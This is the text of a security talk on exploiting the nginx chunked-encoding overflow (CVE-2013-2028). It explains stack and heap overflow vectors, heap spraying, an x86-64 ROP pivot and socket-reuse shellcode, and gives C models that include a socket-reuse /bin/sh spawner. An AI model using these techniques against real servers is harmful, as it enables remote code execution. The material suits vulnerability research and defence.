Exploiting nginx chunked overflow bug, the undisclosed attack vector




Long Le <longld@vnsecurity.net>, VNSECURITY.NET

About VNSECURITY.NET CLGT CTF team 2 VNSECURITY.NET

In this talk
- Nginx brief introduction
- Nginx chunked overflow bug: the analysis, the exploit
- The undisclosed attack vector
- x86-64 ROP tricks
- Demo

Nginx [engine x]
- HTTP and reverse proxy server
- Fast, lightweight
- Popular

Nginx architecture
- Non-blocking I/O, event driven
- Single-threaded workers: one master process, multiple worker processes
- Resource efficient
- Highly modular
ref: http://www.slideshare.net/joshzhu/nginx-internals

Nginx architecture, big picture. ref: http://www.aosabook.org/images/nginx/architecture.png

The vulnerability
An integer overflow (http://en.wikipedia.org/wiki/integer_overflow) in the HTTP chunked transfer-encoding parser of nginx 1.3.9 to 1.4.0 (CVE-2013-2028): the hexadecimal chunk size is accumulated into a signed integer with no range check, so a crafted size wraps around to a negative value.

The analysis (1)
Trigger: a request carrying the header Transfer-Encoding: chunked, so the body arrives as chunks, each prefixed by its length in hexadecimal.

The analysis (2)

The analysis (3)

The analysis (4): stack-based overflow
With the default configuration (static content) the request body is not needed, so it is read into a fixed-size buffer on the stack just to be discarded. The wrapped, negative chunk size survives the signed min() against the buffer size and is then converted to an unsigned read length, so the read writes far past the end of that stack buffer.
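An added C model of the two steps above (written for this page, not nginx's own code, and simplified: nginx's parser is a state machine and the discard buffer is 4096 bytes on the stack). The function names parse_chunk_size_vuln, parse_chunk_size_fixed, recv_len_vuln and recv_len_fixed are this example's own. It shows the chunk size wrapping negative, the negative value surviving a signed min() and becoming a huge unsigned read length, and the checks that stop both.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CHUNK_INVALID INT64_MIN       /* sentinel for a rejected chunk-size line */

typedef int64_t chunk_off_t;          /* stands in for nginx's signed off_t size field */

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Vulnerable parser: accumulates hex digits with no range check. The arithmetic is
 * done on uint64_t so the wrap is well defined in this model; the vulnerable code
 * did the same multiply-add on a signed off_t. */
chunk_off_t parse_chunk_size_vuln(const char *line)
{
    uint64_t acc = 0;
    size_t i;

    for (i = 0; line[i] != '\0' && line[i] != '\r' && line[i] != ';'; i++) {
        int v = hexval((unsigned char) line[i]);
        if (v < 0) return CHUNK_INVALID;
        acc = acc * 16 + (uint64_t) v;
    }
    if (i == 0) return CHUNK_INVALID;
    return (chunk_off_t) acc;   /* 16 digits with a leading 8..f come back negative */
}

/* Fixed parser: refuse a digit that would overflow and, as belt and braces,
 * a size that ended up negative (the kind of check nginx 1.4.1 added). */
chunk_off_t parse_chunk_size_fixed(const char *line)
{
    chunk_off_t size = 0;
    size_t i;

    for (i = 0; line[i] != '\0' && line[i] != '\r' && line[i] != ';'; i++) {
        int v = hexval((unsigned char) line[i]);
        if (v < 0) return CHUNK_INVALID;
        if (size > (INT64_MAX >> 4)) return CHUNK_INVALID;   /* size * 16 + 15 would overflow */
        size = size * 16 + v;
    }
    if (i == 0 || size < 0) return CHUNK_INVALID;
    return size;
}

/* The consumer: read min(chunk size, buffer size) bytes into a fixed buffer.
 * A negative size wins the signed comparison and becomes a huge size_t. */
size_t recv_len_vuln(chunk_off_t size, size_t buf_size)
{
    chunk_off_t n = size < (chunk_off_t) buf_size ? size : (chunk_off_t) buf_size;
    return (size_t) n;
}

/* Same computation with the sign checked first; 0 means "nothing to read". */
size_t recv_len_fixed(chunk_off_t size, size_t buf_size)
{
    if (size <= 0) return 0;
    return (uint64_t) size < buf_size ? (size_t) size : buf_size;
}

int main(void)
{
    const char *evil = "fffffffffffffff0\r\n";    /* constructed chunk-size line */
    chunk_off_t s = parse_chunk_size_vuln(evil);

    printf("vulnerable parser: size=%lld, read length=%zu into a 4096-byte buffer\n",
           (long long) s, recv_len_vuln(s, 4096));
    printf("fixed parser: %s\n",
           parse_chunk_size_fixed(evil) == CHUNK_INVALID ? "rejected" : "accepted");
    return 0;
}
```

Note that the two checks are independent: a correct parser makes the sign check in the consumer redundant, but the consumer check is what contains the damage if another code path ever hands it a negative length.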

The exploit
- Stack cookie bruteforcing: may require hundreds or thousands of connections and leaves noisy error logs. It is feasible at all because workers are forked from the master and inherit its canary, and the master respawns a crashed worker with that same canary, so the cookie can be guessed byte by byte.
- nginx < 1.4.1 binaries from nginx.org have no stack cookie
- ASLR: return into the binary, which is not PIE by default
- NX: ROP
- https://github.com/danghvu/nginx-1.4.0/blob/master/exp-nginx.rb

The humble mitigation
nginx 1.4.1 (and 1.5.0) fixed the chunked parser to reject a chunk size or remaining length that has become negative, so the request is refused before any read length is computed from it.

Quick summary
- Default nginx settings (static content): stack-based overflow, straight to exploit
- A stack cookie slows the attack down but does not stop it

Practical nginx deployment
- nginx + FastCGI backend, e.g. WordPress
- nginx + Apache/Lighttpd: reverse proxy

The undisclosed attack vector
- Same vulnerability, different configuration, more targets
- When the request body has to be handed to a FastCGI or proxied backend, nginx reads it into a heap-allocated buffer instead of discarding it through the stack buffer, so the same wrapped size gives a heap-based overflow
- No stack cookie to worry about
- But not straight to exploit

The analysis (1)

The analysis (2)

The analysis (3)

The analysis (4)

The analysis (5): heap-based overflow

POC trigger

Crash dump

The exploit
- Send enough data
- Craft the payload to pass some checks on the way to the corrupted structures
- ROP stuff
- Run and pray: it is unreliable

The unreliable issue
- Interference from events on the other connections: new connections arriving, connections receiving data, connections closing
- Heap metadata corruption, in both the nginx internal pool and libc malloc
- Difficult to debug because everything is event driven

Crash madness

Nginx internals (1). ref: http://www.slideshare.net/joshzhu/nginx-internals

Nginx internals (2)

Nginx internals (3)

The solution
- Heap spraying: open many connections and force each one to allocate a large chunk, reserving contiguous memory
- Overflow the handler and trigger read_event_handler()
- Send more data on that connection to trigger the read event

The refined POC

Heap spraying (1)

Heap spraying (2): resulting layout, by increasing address: header N, buffer N, header N+1, buffer N+1, header N+2, ... (each connection's header sits immediately after the previous connection's buffer)

Overflow the handler (1): the overflow from buffer N runs straight into header N+1, which holds the neighbouring connection's read event handler

Overflow the handler (2)

The refined exploit
- Open N connections (e.g. N=32)
- All connections send the chunk trigger
- Connections N/2 to N send the same ROP payload, so the sprayed region is filled with copies of it
- Jump into controlled, contiguous memory before overflowing
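An added C model of the spray-and-overflow sequence above (written for this page, not the talk's Ruby exploit or nginx code). It keeps only what the attack needs: a per-connection record with a read event handler followed by its body buffer, laid out contiguously as after the spray, a body read that copies the attacker-derived length unchecked, and the dispatch of the neighbour's read event. The record type, the arena, and the handler functions are this example's own; hijacked_handler stands in for the pivot gadget the real exploit jumps to.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NCONN    8     /* sprayed connections (the talk used N=32) */
#define BODY_BUF 256   /* per-connection request body buffer */

/* Model of a per-connection request record; only the field the attack goes for
 * is kept: the handler nginx calls when more body data arrives on the socket. */
typedef struct request_s request_t;
typedef int (*event_handler_pt)(request_t *r);
struct request_s {
    int              id;
    event_handler_pt read_event_handler;
    char             body[BODY_BUF];   /* body buffer sits right after the header */
};

/* The sprayed heap: one contiguous arena, so body N is immediately followed by
 * header N+1, as in the "header N, buffer N, header N+1" layout. */
static request_t arena[NCONN];

static int normal_read_handler(request_t *r) { return r->id; }             /* benign path */
static int hijacked_handler(request_t *r)    { (void) r; return 0x1337; }  /* stand-in for the pivot gadget */

/* Open N connections: every one gets a header and a body buffer. */
void spray(void)
{
    for (int i = 0; i < NCONN; i++) {
        arena[i].id = i;
        arena[i].read_event_handler = normal_read_handler;
        memset(arena[i].body, 0, BODY_BUF);
    }
}

static char *body_of(int conn)
{
    return (char *) arena + (size_t) conn * sizeof(request_t) + offsetof(request_t, body);
}

/* Vulnerable body read: copies the length derived from the chunk size, unbounded. */
void read_body_vuln(int conn, const char *data, size_t len)
{
    memcpy(body_of(conn), data, len);
}

/* Fixed body read: never more than the buffer holds. */
size_t read_body_fixed(int conn, const char *data, size_t len)
{
    size_t n = len < BODY_BUF ? len : BODY_BUF;
    memcpy(body_of(conn), data, n);
    return n;
}

/* Attacker's chunk: fill body N, step over the start of header N+1, then drop the
 * chosen handler address. In the real exploit the filler must keep header N+1 sane
 * enough to pass nginx's checks before the handler is called. */
size_t build_overflow_payload(char *out, size_t cap, event_handler_pt target)
{
    size_t skip = BODY_BUF + offsetof(request_t, read_event_handler);
    size_t len  = skip + sizeof target;

    if (cap < len) return 0;
    memset(out, 'A', skip);
    memcpy(out + skip, &target, sizeof target);
    return len;
}

/* More data arrives on connection conn: nginx dispatches r->read_event_handler(r). */
int trigger_read_event(int conn)
{
    return arena[conn].read_event_handler(&arena[conn]);
}

/* Full sequence: spray, overflow from connection conn, then poke conn+1.
 * Returns what the neighbour's handler produced: 0x1337 if hijacked, its id if not. */
int demo_overflow(int conn, int fixed)
{
    char payload[BODY_BUF + 64];
    size_t len = build_overflow_payload(payload, sizeof payload, hijacked_handler);

    if (len == 0 || conn + 1 >= NCONN) return -1;
    spray();
    if (fixed) read_body_fixed(conn, payload, len);
    else       read_body_vuln(conn, payload, len);
    return trigger_read_event(conn + 1);
}

int main(void)
{
    printf("vulnerable read: neighbour handler returned 0x%x\n", demo_overflow(3, 0));
    printf("bounded read:    neighbour handler returned 0x%x\n", demo_overflow(3, 1));
    return 0;
}
```

The model also shows why the spray matters: without it the record following buffer N could be anything (libc metadata, a pool block, a closed connection), which is exactly the "crash madness" of the first attempt; with it, the neighbour is known to be another request record laid out the same way.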

x86-64 ROP tricks (1)
- Use 32-bit gadgets: the heap address fits in 32 bits, so xchg esp, eax (which works on the low halves and zero-extends the upper halves) does the job of xchg rsp, rax

x86-64 ROP tricks (2): the pivot
- RIP comes from call [rax+0x30], with RAX pointing at the heap payload
- Payload layout, by increasing address: ret, ret, ret, ret, ret, pop_ret, xchg_ret, real payload
- [rax+0x30] holds xchg_ret, so after the pivot RSP points at the start of the payload: the RET block slides to pop_ret, the pop consumes the xchg_ret slot so it is not executed a second time, and the final ret enters the real payload

x86-64 ROP tricks (3)
Use functions with fewer arguments for ret2plt/ret2libc, since every argument register costs a gadget: prefer mprotect() to mmap64().
- mmap64(): rdi = address, rsi = size, rdx = prot, rcx = flags, r8 = fd, r9 = offset
- mprotect(): rdi = address, rsi = size, rdx = prot
- libc offset: mprotect - mmap = 0x60 (in the libc used for the demo)
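An added C emulation of the pivot on the slide (this page's own example, not code from the talk). The four gadget addresses are hypothetical placeholders in the text segment of a non-PIE binary, not real nginx offsets; the emulator knows only the payload region, so any other memory access counts as a fault, and it stops when control reaches the first entry of the real chain. The same function can build the payload without the pop_ret to show why that slot is needed, and it is called with a heap address above 4 GiB to show why the 32-bit exchange only works for a low heap.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical gadget addresses in a non-PIE text segment (placeholders, not real offsets). */
#define G_RET          0x0000000000403b9eULL   /* ret */
#define G_POP_RET      0x000000000040c1d3ULL   /* pop rbx ; ret */
#define G_XCHG_ESP_EAX 0x00000000004175a2ULL   /* xchg esp, eax ; ret */
#define G_CHAIN_START  0x0000000000402f10ULL   /* first entry of the real chain, e.g. mprotect@plt */

#define PAYLOAD_QWORDS 16

/* The heap payload from the slide: ret sled, pop_ret at 0x28, xchg_ret at 0x30
 * (what call [rax+0x30] fetches), real chain from 0x38. With with_pop == 0 the
 * slot at 0x28 is just another ret, to show what goes wrong without the pop. */
void build_pivot_payload(uint64_t p[PAYLOAD_QWORDS], int with_pop)
{
    int i;
    for (i = 0; i < 5; i++) p[i] = G_RET;
    p[5] = with_pop ? G_POP_RET : G_RET;
    p[6] = G_XCHG_ESP_EAX;
    p[7] = G_CHAIN_START;
    for (i = 8; i < PAYLOAD_QWORDS; i++) p[i] = 0;
}

typedef struct { uint64_t rip, rsp, rax; } cpu_t;

/* Only the payload is mapped; anything else is a fault in the real worker. */
static int load64(const uint64_t *p, uint64_t base, uint64_t addr, uint64_t *out)
{
    if (addr < base || addr - base + 8 > PAYLOAD_QWORDS * 8 || (addr - base) % 8) return 0;
    *out = p[(addr - base) / 8];
    return 1;
}

static int pop64(const uint64_t *p, uint64_t base, cpu_t *c, uint64_t *out)
{
    if (!load64(p, base, c->rsp, out)) return 0;
    c->rsp += 8;
    return 1;
}

/* Emulate the hijacked call: rax = heap payload address, rsp on the normal stack,
 * then 'call [rax+0x30]' and the gadgets that follow. Returns rsp at the moment
 * G_CHAIN_START is reached (i.e. the chain's next slot), or 0 on a fault. */
uint64_t pivot_landing(uint64_t base, int with_pop)
{
    uint64_t p[PAYLOAD_QWORDS];
    cpu_t c = { 0, 0x7ffffffde000ULL, base };
    uint64_t scratch;
    int steps;

    build_pivot_payload(p, with_pop);
    if (!load64(p, base, c.rax + 0x30, &c.rip)) return 0;
    c.rsp -= 8;   /* the call pushes a return address; never consumed after the pivot */

    for (steps = 0; steps < 64; steps++) {
        if (c.rip == G_XCHG_ESP_EAX) {
            /* 32-bit operands: both registers are zero-extended, so rsp becomes the
             * low 32 bits of rax. Correct only while the payload lives below 4 GiB,
             * which the brk heap of a non-PIE binary does. */
            uint32_t esp = (uint32_t) c.rsp, eax = (uint32_t) c.rax;
            c.rsp = eax;
            c.rax = esp;
            if (!pop64(p, base, &c, &c.rip)) return 0;
        } else if (c.rip == G_RET) {
            if (!pop64(p, base, &c, &c.rip)) return 0;
        } else if (c.rip == G_POP_RET) {
            if (!pop64(p, base, &c, &scratch)) return 0;   /* rbx <- the xchg slot at 0x30 */
            if (!pop64(p, base, &c, &c.rip)) return 0;
        } else if (c.rip == G_CHAIN_START) {
            return c.rsp;
        } else {
            return 0;   /* landed on something that is not a gadget */
        }
    }
    return 0;
}

int main(void)
{
    printf("low heap, with pop_ret:    rsp=0x%llx\n", (unsigned long long) pivot_landing(0xc0d000ULL, 1));
    printf("low heap, without pop_ret: rsp=0x%llx (0 = fault)\n", (unsigned long long) pivot_landing(0xc0d000ULL, 0));
    printf("heap above 4 GiB:          rsp=0x%llx (0 = fault)\n", (unsigned long long) pivot_landing(0x100c0d000ULL, 1));
    return 0;
}
```

Without the pop, the sled runs into the xchg slot a second time and swaps the stack back to the truncated original rsp; with a heap above 4 GiB, the first exchange already points rsp at the wrong address. Both failures are the same lesson as the slide: the trick depends on the payload address being a 32-bit value.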

Shellcode tricks
- Continue to serve normal HTTP requests: fork(), then the parent exit()s, so the master respawns a worker while the child keeps the shell
- Advanced socket reuse
  - stage 1, fd hunting: loop over fds 1..1024, read from each, check for the tag, then jump to stage 2 with the fd that carried it
  - stage 2: normal socket-reuse shell on that fd
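An added C version of the two stages (this page's own example, not the talk's shellcode, which is machine code). Two choices are mine: the tag string VNSEC is constructed, and stage 1 uses recv() with MSG_PEEK | MSG_DONTWAIT rather than a plain read, so an idle socket returns EAGAIN instead of blocking the worker, a non-socket fd returns ENOTSOCK, and the tag stays queued for stage 2. The test rig builds two socketpairs standing in for a worker's open connections.

```c
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

#define TAG     "VNSEC"            /* marker the attacker sends first (constructed) */
#define TAG_LEN (sizeof TAG - 1)
#define MAX_FD  1024

/* Stage 1: walk the descriptor table for the socket whose queued input starts
 * with TAG. MSG_PEEK leaves the bytes in place; MSG_DONTWAIT never blocks. */
int hunt_tagged_fd(void)
{
    char buf[TAG_LEN];

    for (int fd = 0; fd < MAX_FD; fd++) {
        ssize_t n = recv(fd, buf, TAG_LEN, MSG_PEEK | MSG_DONTWAIT);
        if (n == (ssize_t) TAG_LEN && memcmp(buf, TAG, TAG_LEN) == 0)
            return fd;
    }
    return -1;
}

/* Stage 2: socket reuse on the found descriptor. As on the slide, fork() and let
 * the parent (the exploited worker) exit so the nginx master respawns a clean
 * worker; the child wires the socket to stdio and becomes the shell.
 * Returns only on failure. Not invoked by the demo below. */
int spawn_shell_on(int fd)
{
    char *const argv[] = { "/bin/sh", NULL };
    pid_t pid = fork();

    if (pid < 0) return -1;
    if (pid > 0) _exit(0);
    dup2(fd, 0);
    dup2(fd, 1);
    dup2(fd, 2);
    execv(argv[0], argv);
    _exit(127);
}

/* Test rig (constructed): two socketpairs stand in for the worker's connections,
 * one with an ordinary request queued, the other with the tag. Returns 1 if the
 * hunt picks the tagged end and the tag is still readable afterwards. */
int demo_fd_hunt(void)
{
    int other[2], attacker[2];
    char buf[TAG_LEN];
    int found, ok;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, other) < 0) return 0;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, attacker) < 0) return 0;

    send(other[0], "GET / HTTP/1.1\r\n", 16, 0);     /* queued on other[1] */
    send(attacker[0], TAG "\n", TAG_LEN + 1, 0);      /* queued on attacker[1] */

    found = hunt_tagged_fd();
    ok = (found == attacker[1])
         && recv(found, buf, TAG_LEN, MSG_DONTWAIT) == (ssize_t) TAG_LEN
         && memcmp(buf, TAG, TAG_LEN) == 0;           /* MSG_PEEK left it in place */

    close(other[0]);
    close(other[1]);
    close(attacker[0]);
    close(attacker[1]);
    return ok;
}

int main(void)
{
    printf("fd hunt found the tagged socket: %s\n", demo_fd_hunt() ? "yes" : "no");
    return 0;
}
```

In real shellcode the loop is the same idea in a dozen instructions; the point of the tag is that a worker holds many sockets that all look alike, and only the attacker's carries bytes the attacker chose.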

Demo

Conclusion
- We found another (now known) attack vector of the nginx chunked overflow bug: not only a stack-based overflow
- It affects almost all practical deployments
- We built a reliable heap-based overflow exploit: no stack cookie bruteforcing, fast to gain a shell
- An exploit on x86 should work the same way, only easier

Questions?